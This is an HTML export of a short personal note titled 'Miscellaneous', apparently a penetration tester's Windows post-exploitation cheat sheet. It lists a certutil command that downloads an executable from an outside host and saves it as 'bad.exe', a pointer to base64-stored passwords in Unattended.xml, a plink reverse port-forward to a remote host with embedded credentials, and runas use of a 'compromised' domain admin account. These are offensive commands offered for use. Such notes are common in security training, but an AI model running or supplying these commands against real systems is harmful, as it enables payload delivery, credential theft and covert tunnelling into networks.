<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>Miscellaneous</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Miscellaneous</h1>

      <div class="ck-content"><pre><code class="language-text-plain">certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe</code></pre>

        <p>"Unattended Setup is the method by which original equipment manufacturers
          (OEMs), corporations, and other users install Windows NT in unattended
          mode." Read more about it <a href="https://support.microsoft.com/en-us/topic/77504e1d-2b75-5be1-3eef-cec3617cc461">here</a>.</p>
        <p>It is also where users passwords are stored in base64. Navigate to
          <span
          style="color:rgb(206,0,0)">C:\Windows\Panther\Unattend\Unattended.xml</span>.</p>
        <p>To list the permissions of all files in the current directory, we can
          use:</p>
        <p><code>cacls *</code>

        </p>
        <p>For port forwarding with plink use the following with ssh running and
          ufw disabled:</p><pre><code class="language-text-plain">echo y|&amp;./plink.exe -ssh -l username -pw password -R 2805:127.0.0.1:2805 10.17.17.11</code></pre>

        <p>the <code>runas</code> command, which we can use to authenticate as another
          user in the command prompt. We can use the following command in cmd to
          authenticate as the now compromised DA user:</p>
        <p><code>runas /user:john cmd.exe</code>

        </p>
      </div>
    </div>
  </body>

</html>